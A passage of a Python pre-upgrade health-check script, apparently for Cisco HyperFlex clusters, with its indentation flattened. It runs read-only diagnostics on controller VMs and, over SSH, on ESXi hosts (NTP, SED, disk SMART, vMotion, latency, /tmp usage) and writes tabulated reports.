cmd = "grep -i ^esxi.version /usr/share/springpath/storfs-fw/springpath-hcl.conf"
op = execmd(cmd)
svsp = []
if op:
for line in op:
if "esxi.version=" in line:
l = line.split("=")
if len(l) == 2:
vl = l[1]
svsp = vl.split(",")
testsum[ip]["Supported vSphere versions"] = {"Status": str("\n".join(svsp)), "Result": "Prints the supported ESXi versions."}
# 14) Check permissions for /tmp
cmd = "ls -ld /tmp"
op = execmd(cmd)
tmprcheck = ""
for line in op:
if line.startswith("drwxr-xrwx") or line.startswith("drwxrwxrwx"):
tmprcheck = "PASS"
else:
tmprcheck = "FAIL"
testsum[ip]["Check permissions for /tmp"] = {"Status": tmprcheck, "Result": "Checks if the /tmp permissions are set correctly."}
# 15) Cluster Policy (Lenient/Strict) check
cmd = "stcli cluster info | grep -i 'clusterAccessPolicy:' | head -1"
op = execmd(cmd)
clPolicy = ""
for line in op:
if "lenient" in line.lower():
clPolicy = "Lenient"
testsum[ip]["Check Cluster Policy"] = {"Status": "Lenient", "Result": "Checks the Configured Cluster Policy"}
elif "strict" in line.lower():
clPolicy = "Strict"
testsum[ip]["Check Cluster Policy"] = {"Status": "Strict", "Result": "Please refer - https://tinyurl.com/yadvhd84"}
# 16) Upgrade suggestion for HX version 2.1(1x)
hxv = ""
hxupsug = ""
try:
hxv = hostd[ip]["version"]
m = re.search(r"2\.1[\.|(]1.", hxv)
if m:
hxupsug = "DO NOT direct upgrade to 3.5.2g.\nUpgrade to 3.5.2f first."
except Exception:
pass
# 17) Different sector size check for HX version equal to 3.5.2a or < 3.0.1j
hxsectchk = ""
if "3.5.2a" in hxv:
hxsectchk = "Do not perform node expansion or add drives (with HX-SD38TBE1NK9) before \nupgrading to higher versions"
elif hxv.startswith("1.") or hxv.startswith("2."):
hxsectchk = "Do not perform node expansion or add drives (with HX-SD38TBE1NK9) before \nupgrading to higher versions"
else:
m = re.search(r"3\.0\.1[a-j]", hxv)
if m:
hxsectchk = "Do not perform node expansion or add drives (with HX-SD38TBE1NK9) before \nupgrading to higher versions"
# 18) Check springpath_keystore.jceks file [Run in Thread]
keystoreCheck = str(hostd[ip]["check keystore"])
if keystoreCheck == "FAIL":
testsum[ip]["Check springpath_keystore.jceks file"] = {"Status": "FAIL", "Result": "If failed, contact Cisco TAC."}
else:
testsum[ip]["Check springpath_keystore.jceks file"] = {"Status": keystoreCheck, "Result": "All the SCVM have same keystore file."}
# 19) SED Capable Check
global lsusbCheck
sedCapable = False
usbCheck = False
sedEnable = False
sedDrive = False
diskLock = ""
cmd = "cat /etc/springpath/sed_capability.conf"
op = execmd(cmd)
for line in op:
if "True" in line:
sedCapable = True
if sedCapable:
testsum[ip]["SED Capable"] = {"Status": "YES", "Result": "Checks if the cluster is SED Capable."}
else:
testsum[ip]["SED Capable"] = {"Status": "NO", "Result": "Checks if the cluster is SED Capable."}
if sedCapable:
# 20) USB0 Check:
cmd = "ifconfig | grep -i usb0 -A1 | grep 'inet addr' | cut -d ':' -f2 | cut -d ' ' -f1"
op = execmd(cmd)
if op:
usbCheck = True
testsum[ip]["USB0 check"] = {"Status": "PASS", "Result": "Checks for USB0 in SED clusters."}
else:
lsusbCheck = True
testsum[ip]["USB0 check"] = {"Status": "FAIL", "Result": "Contact TAC"}
# 21) SED AF Drives – 5100/5200 Check
# Condition1 : Running 3.5(2a) and below
# Condition2: Micron_5100 or Micron_5200 in /var/log/springpath/diskslotmap-v2.txt
sflag1 = sflag2 = 0
if "3.5.2a" in hxv:
sflag1 = 1
elif hxv.startswith("1.") or hxv.startswith("2."):
sflag1 = 1
elif hxv.startswith("3.5"):
m1 = re.search(r"[1-3]\.[0-5]\.1[a-z]", hxv)
if m1:
sflag1 = 1
else:
m2 = re.search(r"3\.[0-4]", hxv)
if m2:
sflag1 = 1
# Condition2: Micron_5100 or Micron_5200 in /var/log/springpath/diskslotmap-v2.txt
cmd = "grep -E -- 'Micron_5100|Micron_5200' /var/log/springpath/diskslotmap-v2.txt"
op = execmd(cmd)
for line in op:
if "Micron_5100" in line or "Micron_5200" in line:
sflag2 = 1
if sflag1 and sflag2:
global sedNote
sedNote = True
testsum[ip]["SED AF Drives – 5100/5200 check"] = {"Status": "FAIL", "Result": "Please refer - https://tinyurl.com/vqnytww"}
elif not sflag1 and sflag2:
sedDrive = True
testsum[ip]["SED AF Drives – 5100/5200 check"] = {"Status": "PASS", "Result": "Checks if Micron 5100/5200 drives in use."}
# 22) SED Enabled Check:
cmd = "cat /etc/springpath/sed.conf"
op = execmd(cmd)
for line in op:
if "sed_encryption_state=enabled" in line:
sedEnable = True
testsum[ip]["SED Enabled"] = {"Status": "YES", "Result": "Checks if the cluster is SED Enabled."}
else:
testsum[ip]["SED Enabled"] = {"Status": "NO", "Result": "Checks if the cluster is SED Enabled."}
# 23) Disk Locked Check:
if sedEnable:
cmd = "/usr/share/springpath/storfs-appliance/sed-client.sh -l | cut -d ',' -f5 | grep -a 1"
op = execmd(cmd)
if op:
diskLock = "PASS"
testsum[ip]["Disk Locked check"] = {"Status": "PASS", "Result": "Checks if any SED disk is locked."}
else:
diskLock = "FAIL"
testsum[ip]["Disk Locked check"] = {"Status": "FAIL", "Result": "Checks if any SED disk is locked."}
# Stretch Cluster check
global stretchCluster
witnessVmIp = ""
witnessReachability = ""
witnessLatetency = ""
storageLatetency = ""
if stretchCluster:
# Get the Witness VM IP
cmd = "stcli cluster info | grep dataZkIp"
op = execmd(cmd)
for line in op:
m = re.search(r"([\d]{1,3}(.[\d]{1,3}){3})", line)
if m:
witnessVmIp = str(m.group(1))
log_msg(INFO, "Witness VM IP Address: " + str(witnessVmIp) + "\r")
# 24) Check Witness Reachability
# Ping from eth0 to Witness VM IP Address
if witnessVmIp:
hostd[ip]["witnessVmIp"] = witnessVmIp
eth0 = hostd[ip]["eth0"]
cmd = "ping -I {} {} -c 3 -i 0.5".format(eth0, witnessVmIp)
wop = execmd(cmd)
witnessReachability = pingstatus(wop)
testsum[ip]["Check Witness Reachability"] = {"Status": witnessReachability, "Result": "Checks Witness VM IP address is reachabile."}
# 25) Check Witness Latency
# Ping Time should be less than 200ms
for line in wop:
if "round-trip" in line:
m = re.search(r"\/(\d+\.\d+)\sms$", line.strip())
if m:
pingTime = str(m.group(1))
try:
if float(pingTime) < 200:
witnessLatetency = "PASS"
else:
witnessLatetency = "FAIL"
# 26) Check Storage Latency
# Ping Time should be less than 5ms
if float(pingTime) < 5:
storageLatetency = "PASS"
else:
storageLatetency = "FAIL"
testsum[ip]["Check Witness Latetency"] = {"Status": witnessLatetency,
"Result": "Checks Witness VM IP address is latetency."}
testsum[ip]["Check Storage Latetency"] = {"Status": storageLatetency,
"Result": "Checks Storage latetency."}
except Exception:
pass
# 27) Check ZK-Cleanup-Script
# Only for HX 4.0.2c
zkstatus = ""
try:
if "4.0.2c" in hostd[ip]["version"]:
cmd = "ps -aux | grep ZKTx | wc -l"
op = execmd(cmd)
if op:
zkcnt = op[0]
if zkcnt.isdigit():
if int(zkcnt) == 0:
zkstatus = "FAIL"
else:
zkstatus = "PASS"
if zkstatus == "FAIL":
testsum[ip]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "http://cs.co/9008HGXsy"}
else:
testsum[ip]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "Check to Identify multiple ZKTxnCleanup script."}
except Exception:
pass
# 28) Run lsusb when USB0 Check Fails
if lsusbCheck:
cmd = "lsusb"
op = execmd(cmd)
# 29) Check Disk for SMART Failure
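# For every block device reported by lsblk (majors 1, 2, 7 and 11 - RAM, floppy, loop and
# CD-ROM devices - are excluded): NVMe devices are checked via "nvme smart-log" critical_warning,
# all other disks via smartctl's exit status masked with 26 to keep only the failure-related
# bits (device could not be opened, SMART reports the disk failing, or pre-fail attributes
# at/below threshold). A non-zero value after the device name marks that disk as suspect.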
cmd = """for D in $(/bin/lsblk -dpn -e 1,2,7,11 | awk '{ print $1 }'); do
echo $D | grep -q nvme
if [ $? -eq 0 ];
then
STATUS=$(/usr/sbin/nvme smart-log $D 2> /dev/null |
awk -F': ' '/critical_warning/ { print $NF }')
else
/usr/sbin/smartctl -q silent -H -i $D;
STATUS=$?
STATUS=$((STATUS & 26))
fi
echo "$D: $STATUS";
done"""
diskList = execmd(cmd)
smartFailDiskList = []
for disk in diskList:
if "0" not in disk:
smartFailDiskList.append(disk)
if smartFailDiskList:
testsum[ip]["Check Disk for SMART Failure"] = {"Status": "FAIL", "Result": "Contact TAC"}
else:
testsum[ip]["Check Disk for SMART Failure"] = {"Status": "PASS", "Result": "Checking Disk for SMART Failure"}
# Check hxuser password
testsum[ip]["Check hxuser password characters"] = {"Status": str(hostd[ip]["check hxuser password"]), "Result": "Checking hxuser password characters"}
#####################################################
# Update Test Detail info
testdetail[ip]["Pre-Upgrade check"] = OrderedDict()
# HX Cluster version
testdetail[ip]["Pre-Upgrade check"]["HX Cluster version"] = hxvs
# NTP daemon running
testdetail[ip]["Pre-Upgrade check"]["NTP daemon running"] = {"Status": ntp_deamon, "Result": ntp_deamon_check}
# NTP sync check
testdetail[ip]["Pre-Upgrade check"]["NTP sync check"] = {"Status": ntp_sync_line, "Result": ntp_sync_check}
# DNS check
testdetail[ip]["Pre-Upgrade check"]["DNS check"] = {"Status": str("\n".join(digop)), "Result": dns_check}
# vCenter reachability check
testdetail[ip]["Pre-Upgrade check"]["vCenter reachability check"] = {"Status": vcenterip, "Result": vcenter_check}
# Timestamp check
allhostdt = []
for i in sorted(hostd.keys()):
allhostdt.append(str(i) + " - " + str(hostd[i]["date"]))
testdetail[ip]["Pre-Upgrade check"]["Timestamp check"] = {"Status": str("\n".join(allhostdt)), "Result": str(hostd[ip]["date check"])}
# Primary NTP Source check
allntpsrc = []
for p in sorted(hostd.keys()):
allntpsrc.append(str(p) + " : NTP IP - " + str(hostd[p]["ntp source"]))
testdetail[ip]["Pre-Upgrade check"]["Primary NTP Source check"] = {"Status": str("\n".join(allntpsrc)), "Result": str(hostd[ip]["ntp source check"])}
# Cluster usage
testdetail[ip]["Pre-Upgrade check"]["Cluster Fault Tolerance"] = "Node Failures Tolerable:" + str(NFT) + "\nHDD Failures Tolerable:" + str(HFT) + "\nSSD Failures Tolerable:" + str(SFT)
# Cache usage
testdetail[ip]["Pre-Upgrade check"]["Cache vNodes"] = {"Status": str("\n".join(cachl)), "Result": check_cache_vnodes}
# Cluster Upgrade Status: Removed
# No extra pnodes
testdetail[ip]["Pre-Upgrade check"]["No extra pnodes"] = nodecheck
# Check package & versions
testdetail[ip]["Pre-Upgrade check"]["Check package & versions"] = {"Status": str("\n".join(hostd[ip]["package & versions"])), "Result": str(hostd[ip]["check package & versions"])}
# Check Iptables count
testdetail[ip]["Pre-Upgrade check"]["Check Iptables count"] = {"Status": str(hostd[ip]["iptables count"]), "Result": str(hostd[ip]["check iptables"])}
# Check memory
testdetail[ip]["Pre-Upgrade check"]["Check Memory usage"] = str(check_memory)
# Check CPU
testdetail[ip]["Pre-Upgrade check"]["Check CPU"] = str("\n".join(check_cpu))
# Check Out of memory
testdetail[ip]["Pre-Upgrade check"]["Incidence of OOM in the log file"] = str("\n".join(check_oom))
# Supported vSphere versions
testdetail[ip]["Pre-Upgrade check"]["Supported vSphere versions"] = str("\n".join(svsp))
# Check permissions for /tmp
testdetail[ip]["Pre-Upgrade check"]["Check permissions for /tmp"] = tmprcheck
if hxupsug != "":
testdetail[ip]["Pre-Upgrade check"]["Upgrade suggestion for HX version 2.1(1x)"] = hxupsug
if hxsectchk != "":
testdetail[ip]["Pre-Upgrade check"]["Different sector size check"] = hxsectchk
# Cluster Policy (Lenient/Strict) check
if clPolicy == "Strict":
testdetail[ip]["Pre-Upgrade check"]["Cluster Policy check"] = {"Status": "Strict", "Result": "Please refer - https://tinyurl.com/yadvhd84"}
else:
testdetail[ip]["Pre-Upgrade check"]["Cluster Policy check"] = clPolicy
# Check springpath_keystore.jceks file
testdetail[ip]["Pre-Upgrade check"]["Check springpath_keystore.jceks file"] = str(hostd[ip]["check keystore"])
# SED Capable Check:
if sedCapable:
testdetail[ip]["Pre-Upgrade check"]["SED Capable"] = "YES"
if usbCheck:
testdetail[ip]["Pre-Upgrade check"]["USB0 check"] = "PASS"
else:
testdetail[ip]["Pre-Upgrade check"]["USB0 check"] = {"Status": "FAIL", "Result": "Contact TAC"}
else:
testdetail[ip]["Pre-Upgrade check"]["SED Capable"] = "NO"
# SED AF Drives – 5100/5200 Check
if sedNote:
testdetail[ip]["Pre-Upgrade check"]["SED AF Drives – 5100/5200 check"] = {"Status": "FAIL", "Result": "Please refer - https://tinyurl.com/vqnytww"}
if sedDrive:
testdetail[ip]["Pre-Upgrade check"]["SED AF Drives – 5100/5200 check"] = "PASS"
# SED Enabled Check:
if sedEnable:
testdetail[ip]["Pre-Upgrade check"]["SED Enabled"] = "YES"
testdetail[ip]["Pre-Upgrade check"]["Disk Locked check"] = diskLock
# Stretch Cluster Check
if witnessVmIp:
testdetail[ip]["Pre-Upgrade check"]["Check Witness Reachability"] = {"Status": witnessReachability, "Result": "Checks Witness VM IP address is reachabile."}
testdetail[ip]["Pre-Upgrade check"]["Check Witness Latetency"] = {"Status": witnessLatetency, "Result": "Checks Witness VM IP address is latetency."}
testdetail[ip]["Pre-Upgrade check"]["Check Storage Latetency"] = {"Status": storageLatetency, "Result": "Checks Storage latetency."}
# Check ZK-Cleanup-Script
if zkstatus:
if zkstatus == "FAIL":
testdetail[ip]["Pre-Upgrade check"]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "http://cs.co/9008HGXsy"}
else:
testdetail[ip]["Pre-Upgrade check"]["Check ZK-Cleanup-Script"] = {"Status": zkstatus, "Result": "Check to Identify multiple ZKTxnCleanup script."}
# Check Disk for SMART Failure
if smartFailDiskList:
testdetail[ip]["Pre-Upgrade check"]["Check Disk for SMART Failure"] = {"Status": "FAIL", "Result": "\n".join(smartFailDiskList)}
else:
testdetail[ip]["Pre-Upgrade check"]["Check Disk for SMART Failure"] = "PASS"
# Check hxuser password
testdetail[ip]["Pre-Upgrade check"]["Check hxuser password characters"] = str(hostd[ip]["check hxuser password"])
def network_check(ip):
# Network Check(ESX)
try:
# Close connection
client.close()
except Exception:
pass
esxip = hostd[ip]["esxip"]
esx_version = ""
try:
if esxip != "":
# Initiate SSH Connection
client.connect(hostname=esxip, username=hxusername, password=esxpassword, timeout=time_out)
msg = "\r\nSSH connection established to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
# Get all ESX and Storage Controller IP Address
opd = OrderedDict()
nwtestsum[esxip] = OrderedDict()
nwtestdetail[esxip] = OrderedDict()
# 1) Check hx user created
hxac = ""
try:
cmd = "esxcli system account list"
op = execmd(cmd)
hxac = "FAIL"
for line in op:
if "hxuser" in line or "springpath" in line:
hxac = "PASS"
opd.update({"HX User Account Created": hxac})
except Exception:
pass
# 2) Check vMotion Enabled
vmst = esx_vmotion[esxip]["vmotion"]
opd.update({"vMotion Enabled": vmst})
# 3) Check vMotion reachability check
allvmkpingchk = []
vmknode = esx_vmotion[esxip].get("vmknode", "")
if vmst == "PASS" and vmknode != "":
for vip in esx_vmotion.keys():
mtu = esx_vmotion[str(vip)]["mtu"]
vmkip = esx_vmotion[str(vip)]["vmkip"]
if vip == esxip:
continue
elif vmkip != "":
try:
cmd = "vmkping -I {} -c 3 -d -s {} -i 0.5 {}".format(vmknode, mtu, vmkip)
op = execmd(cmd)
pst = pingstatus(op)
opd.update({cmd: pst})
allvmkpingchk.append(pst)
except Exception:
pass
# 4) Check ESXi Version
try:
cmd = "vmware -l"
op = execmd(cmd)
opd.update({"ESX Version": op})
v = op[0]
m = re.search(r"ESXi (\d\.\d)", v)
if m:
esx_version = m.group(1)
except Exception:
pass
# 5) ESX vib list
vibl = []
try:
#cmd = "esxcli software vib list| grep -i spring"
cmd = "esxcli software vib list| egrep -i 'scvm|stHyper|stfs'"
op = execmd(cmd)
for line in op:
vibl.append(line.replace(" "*26, " "))
opd.update({"ESX Vib List": vibl})
except Exception:
pass
# 6) Check SCVM and STFSNasPlugin version: Removed
# 7) ESX Services
try:
cmd = "chkconfig --list | grep -E 'ntpd|hostd|vpxa|stHypervisorSvc|scvmclient|hxctlvm'"
op = execmd(cmd)
opd.update({"ESX Services": op})
except Exception:
pass
# 8) Check for HX down during upgrade
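# The ESXi failback timer (TeamPolicyUpDelay) should be at least 30000 ms; the 10 s default
# can cause a brief HX outage during UCS infra upgrades (see the bug table at the end of the report).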
check_HX_down_status = ""
try:
if esx_version and float(esx_version) >= 6.7:
# ESXi 6.7 and above
cmd = "netdbg vswitch runtime get | grep TeamPolicyUpDelay -A2 | cut -d ':' -f2"
op = execmd(cmd)
if op:
v = op[0]
v = v.strip()
if v.isdigit():
if int(v) < 30000:
check_HX_down_status = "FAIL"
else:
check_HX_down_status = "PASS"
else:
# ESXi 6.5 and lower
cmd = "esxcli system settings advanced list | grep TeamPolicyUpDelay -A2 | grep Int | cut -d ':' -f2 | cut -d ' ' -f2"
op = execmd(cmd)
if op:
v = op[0]
v = v.strip()
if v.isdigit():
if int(v) < 30000:
check_HX_down_status = "FAIL"
else:
check_HX_down_status = "PASS"
opd["Check for ESXI Failback timer"] = check_HX_down_status
except Exception:
pass
# 9) vmk1 ping to each SCVM eth1
vmk1 = ""
mtu = "1472"
try:
vmk1 = hostd[ip]["vmk1"]
mtu = vmk1_mtu[vmk1]["mtu"]
except Exception:
if esxip in compute_vmk0_list:
vmk1 = esxip
# Get MTU
try:
cmd = "esxcfg-vmknic -l"
op = execmd(cmd)
for line in op:
if vmk1 in line and "IPv4" in line:
if " 1500 " in line:
mtu = "1472"
elif " 9000 " in line:
mtu = "8972"
except Exception as e:
log_msg(ERROR, str(e) + "\r")
vmkpingchk = []
if len(eth1_list) > 0 and vmk1:
for k in eth1_list:
try:
cmd = "vmkping -I {} -c 3 -d -s {} -i 0.5 {}".format("vmk1", mtu, k)
op = execmd(cmd)
pst = pingstatus(op)
opd.update({cmd: pst})
vmkpingchk.append(pst)
except Exception:
pass
# 10) vSwitch info of ESXi
try:
cmd = "esxcfg-vswitch -l"
op = execmd(cmd)
cm = "esxcfg-vswitch -l"
opd.update({cm: op})
except Exception:
pass
# 11) Check extra controller vm folders
vmfld = ""
try:
cmd = "esxcli hardware platform get | grep -i serial"
op = execmd(cmd)
srno = ""
for line in op:
if line.startswith("Serial Number"):
l = line.split(": ")
try:
srno = l[1]
srno = srno.strip()
except Exception:
pass
break
if srno != "":
cmd = "ls /vmfs/volumes/SpringpathDS-" + str(srno.strip())
op = execmd(cmd)
op = [x for x in op if x != ""]
vmfld = "PASS"
#print(len(op))
fcnt = 0
if op:
for line in op:
l = line.split()
for d in l:
if d.startswith("stCtlVM"):
fcnt += 1
if fcnt > 1:
vmfld = "FAIL" + "\nBug: HX Down"
opd.update({"No extra controller vm folders": vmfld})
except Exception:
pass
# 12) VMware Tools location check:
vmtoolcheck = ""
try:
cmd = "esxcli system settings advanced list -o /UserVars/ProductLockerLocation | grep -i 'string value'"
op = execmd(cmd)
svalue = ""
dsvalue = ""
for line in op:
if line.startswith("String Value"):
svalue = line.split(": ")[1]
elif line.startswith("Default String Value"):
dsvalue = line.split(": ")[1]
if svalue != "" and dsvalue != "":
if svalue == dsvalue:
vmtoolcheck = "PASS"
else:
vmtoolcheck = "FAIL"
opd.update({"VMware Tools location check": vmtoolcheck})
except Exception:
pass
# 13) vfat Disk Usage check
vfatcheck = "PASS"
try:
cmd = "df -h | grep vfat | grep 100%"
op = execmd(cmd)
for line in op:
if "100%" in line:
vfatcheck = "FAIL"
break
opd.update({"vfat Disk Usage check": vfatcheck})
except Exception:
pass
# 14) Check /tmp usage
tmpUsageCheck = ""
try:
cmd = "vdf | grep tmp"
op = execmd(cmd)
for line in op:
if "tmp" in line:
m = re.search(r"\s(\d+)%\s", line)
if m:
usg = m.group(1)
if int(usg) <= 80:
tmpUsageCheck = "PASS"
else:
tmpUsageCheck = "FAIL"
opd.update({"Check /tmp usage": tmpUsageCheck})
except Exception:
pass
# 15) Micron 5100 Drive Firmware Check
mfwcheck = ""
micronbug = ""
try:
cmd = "esxcli storage core device list"
op = execmd(cmd)
mflag1 = mflag2 = 0
for line in op:
if "Model:" in line and "Micron_5100" in line:
mflag1 = 1
mflag2 = 0
mfwcheck = "PASS"
continue
elif mflag1 == 1 and "Revision:" in line:
mflag1 = 0
mflag2 = 1
if mflag2 == 1 and "U049" in line:
micronbug = "Please Refer: https://tinyurl.com/vqnytww"
mfwcheck = "FAIL"
break
if micronbug != "":
opd.update({"Micron 5100 Drive Firmware Check": micronbug})
except Exception:
pass
# 16) Run lsusb when USB0 Check Fails
global lsusbCheck
if lsusbCheck:
try:
cmd = "lsusb"
op = execmd(cmd)
except Exception:
pass
# Update Test Detail
nwtestdetail.update({esxip: opd})
# Close connection
client.close()
# Test summary
# HX User Account check
nwtestsum[esxip]["HX User Account check"] = {"Status": hxac, "Result": "Checks if HXUSER is present."}
# vMotion enabled check
nwtestsum[esxip]["vMotion enabled check"] = {"Status": esx_vmotion[esxip]["vmotion"], "Result": "Checks if vMotion is enabled on the host."}
# vMotion reachability check: Removed
# Check for HX down during upgrade
#nwtestsum[esxip]["Check for HX down during upgrade"] = check_HX_down_status[:4]
if check_HX_down_status == "FAIL":
nwtestsum[esxip]["Check for ESXI Failback timer"] = {"Status": check_HX_down_status,
"Result": "If Failed, Change the failback timer to 30secs:" + "\na)For ESXi 6.5: 'esxcfg-advcfg -s 30000 /Net/TeamPolicyUpDelay'\nb)For ESXi 6.7: 'netdbg vswitch runtime set TeamPolicyUpDelay 30000'"}
else:
nwtestsum[esxip]["Check for ESXI Failback timer"] = {"Status": check_HX_down_status, "Result": "Checks for ESXi FAILBACK timer set to 30000ms."}
# Check vmk1 ping to eth1
if vmkpingchk:
if "FAIL" in vmkpingchk:
nwtestsum[esxip]["Check vmk1 ping to eth1"] = {"Status": "FAIL",
"Result": "If Failed, Perform manual vmkping between ESXi vmk1 and SCVM eth1."}
else:
nwtestsum[esxip]["Check vmk1 ping to eth1"] = {"Status": "PASS",
"Result": "Checks Network between ESXi vmk1 and SCVM eth1."}
# No extra controller vm folders check
nwtestsum[esxip]["No extra controller vm folders check"] = {"Status": vmfld[:4], "Result": "Checks for duplicate Controller SCVM Folders."}
# VMware Tools location check
nwtestsum[esxip]["VMware Tools location check"] = {"Status": vmtoolcheck, "Result": "Checks for Non default VMware Tools location."}
# vfat Disk Usage check
nwtestsum[esxip]["vfat Disk Usage check"] = {"Status": vfatcheck, "Result": "Checks for vfat Disk Usage."}
# Check /tmp usage
if tmpUsageCheck == "FAIL":
nwtestsum[esxip]["Check /tmp usage"] = {"Status": tmpUsageCheck, "Result": "Please ensure usage of /tmp is less than 80%."}
else:
nwtestsum[esxip]["Check /tmp usage"] = {"Status": tmpUsageCheck, "Result": "Checking for /tmp usage."}
# Micron 5100 Drive Firmware Check
if mfwcheck:
nwtestsum[esxip]["Micron 5100 Drive Firmware Check"] = {"Status": mfwcheck, "Result": micronbug}
except Exception as e:
msg = "\r\nNot able to establish SSH connection to ESX Host: " + esxip + "\r"
log_msg(INFO, msg)
#log_msg("", msg)
log_msg(ERROR, str(e) + "\r")
def create_sub_report(ip):
# create HX controller report file
global subreportfiles
filename = "HX_Report_" + str(ip) +".txt"
subreportfiles.append(filename)
with open(filename, "w") as fh:
fh.write("\t\t\t HX Health Check " + str(toolversion))
fh.write("\r\n")
fh.write("\t\t\tHX Controller: " + ip)
fh.write("\r\n")
fh.write("\t\t\tHX Hostname: " + hostd[ip].get("hostname", ""))
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
n = 1
for cname in testdetail[ip].keys():
fh.write("\r\n" + str(n) + ") " + cname + ":")
fh.write("\r\n")
tw = PrettyTable(hrules=ALL)
tw.field_names = ["Name", "Status", "Comments"]
tw.align = "l"
for k, v in testdetail[ip][cname].items():
if type(v) == list:
tw.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
tw.add_row([k, v["Status"], v["Result"]])
else:
tw.add_row([k, v, ""])
fh.write((str(tw)).replace("\n", "\r\n"))
fh.write("\r\n")
n += 1
#print("\r\nSub Report File: " + filename)
log_msg(INFO, "Sub Report File: " + filename + "\r")
def display_result():
# Display the test results
if arg == "detail":
print("")
for ip in testdetail.keys():
print("\r\n\t\t\tHX Controller: " + ip)
print("#"*80)
n = 1
for cname in testdetail[ip].keys():
print("\r\n" + str(n) + ") " + cname)
td = PrettyTable(hrules=ALL)
td.field_names = ["Name", "Status", "Comments"]
td.align = "l"
for k, v in testdetail[ip][cname].items():
if type(v) == list:
td.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
td.add_row([k, v["Status"], v["Result"]])
else:
td.add_row([k, v, ""])
print(td)
time.sleep(5)
n += 1
print("\r\n" + "#" * 80)
print("\r\t\t\tNetwork check:")
print("\r" + "#" * 80)
print("\r\nESX vmk0: " + ", ".join(esx_hostsl) + "\r")
print("\r\nESX vmk1: " + ", ".join(vmk1_list) + "\r")
print("\r\nSCVM eth0: " + ", ".join(eth0_list) + "\r")
print("\r\nSCVM eth1: " + ", ".join(eth1_list) + "\r")
for eip in nwtestdetail.keys():
print("\r\nESX Host: " + eip)
ed = PrettyTable(hrules=ALL)
ed.field_names = ["Command/Condition", "Response/Status", "Comments"]
ed.align = "l"
for k, v in nwtestdetail[eip].items():
if type(v) == list:
ed.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
ed.add_row([k, v["Status"], v["Result"]])
else:
ed.add_row([k, v, ""])
print(ed)
time.sleep(5)
# Bug details table
print("\n\nBugs Detail:")
print(bgt)
time.sleep(5)
else:
print("")
for ip in testsum.keys():
print("\r\nHX Controller: " + ip)
print("\rTest Summary:")
ts = PrettyTable(hrules=ALL)
ts.field_names = ["Name", "Result", "Comments"]
ts.align = "l"
for k, v in testsum[ip].items():
if type(v) == list:
ts.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
ts.add_row([k, v["Status"], v["Result"]])
else:
ts.add_row([k, v, ""])
print(ts)
print("\r\n" + "#" * 80)
print("\r\t\t\tNetwork check:")
print("\r" + "#" * 80)
print("\r\nESX vmk0: " + ", ".join(esx_hostsl) + "\r")
print("\r\nESX vmk1: " + ", ".join(vmk1_list) + "\r")
print("\r\nSCVM eth0: " + ", ".join(eth0_list) + "\r")
print("\r\nSCVM eth1: " + ", ".join(eth1_list) + "\r")
for eip in nwtestsum.keys():
print("\r\nESX Host: " + eip)
es = PrettyTable(hrules=ALL)
es.field_names = ["Name", "Result", "Comments"]
es.align = "l"
for k, v in nwtestsum[eip].items():
if type(v) == list:
es.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
es.add_row([k, v["Status"], v["Result"]])
else:
es.add_row([k, v, ""])
print(es)
def create_main_report(clusterName, clusterType):
global sedflag
# create main report file
filename = "HX_Tool_Main_Report_" + get_date_time() + ".txt"
with open(filename, "w") as fh:
fh.write("\t\t\tHX Health Check " + str(toolversion))
fh.write("\r\n")
fh.write("\t\t\t:HX Tool Main Report:")
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("\r\nCluster Name: " + str(clusterName.strip()))
fh.write("\r\n")
fh.write("\r\nCluster Type: " + str(clusterType.strip()).upper())
fh.write("\r\n")
fh.write("\r\nHX Cluster Nodes:")
fh.write("\r\n")
fh.write((str(ht)).replace("\n", "\r\n"))
fh.write("\r\n")
fh.write("\r\n")
# Each HX Node Report
for ip in hxips:
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("\t\t\tHX Controller: " + ip)
fh.write("\r\n")
fh.write("\t\t\tHX Hostname: " + hostd[ip].get("hostname", ""))
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
n = 1
try:
for cname in testdetail[ip].keys():
fh.write("\r\n" + str(n) + ") " + cname + ":")
fh.write("\r\n")
tw = PrettyTable(hrules=ALL)
tw.field_names = ["Name", "Status", "Comments"]
tw.align = "l"
for k, v in testdetail[ip][cname].items():
if type(v) == list:
tw.add_row([k, "\n".join(v), ""])
elif type(v) == dict:
tw.add_row([k, v["Status"], v["Result"]])
else:
tw.add_row([k, v, ""])
fh.write((str(tw)).replace("\n", "\r\n"))
fh.write("\r\n")
n += 1
except Exception:
continue
with open(filename, "a") as fh:
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("\r\n\t\t\t Network check:" + "\r")
fh.write("\r\n")
fh.write("#" * 80)
fh.write("\r\n")
fh.write("vmk0: " + ", ".join(esx_hostsl))
fh.write("\r\n")
fh.write("vmk1: " + ", ".join(vmk1_list))
fh.write("\r\n")
fh.write("eth0: " + ", ".join(eth0_list))
fh.write("\r\n")
fh.write("eth1: " + ", ".join(eth1_list))
fh.write("\r\n")
for host in sorted(nwtestdetail.keys()):
fh.write("\r\nESX Host: " + host + "\r")
t4 = PrettyTable(hrules=ALL)
t4.field_names = ["Command", "Response", "Comments"]
t4.align = "l"
for k, v in nwtestdetail[host].items():
if type(v) == list:
t4.add_row([k, "\n".join(v), ""])
else:
t4.add_row([k, v, ""])
fh.write("\r\n")
fh.write((str(t4)).replace("\n", "\r\n"))
fh.write("\r\n")
fh.write("\r\n")
fh.write("\r\nRelease Notes:" + "\r\n")
fh.write("https://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-release-notes-list.html" + "\r\n")
fh.write("\r\nUpgrade Guides:" + "\r\n")
fh.write("https://www.cisco.com/c/en/us/support/hyperconverged-systems/hyperflex-hx-data-platform-software/products-installation-guides-list.html" + "\r\n")
fh.write("\r\n")
fh.write("\r\nNote:" + "\r\n")
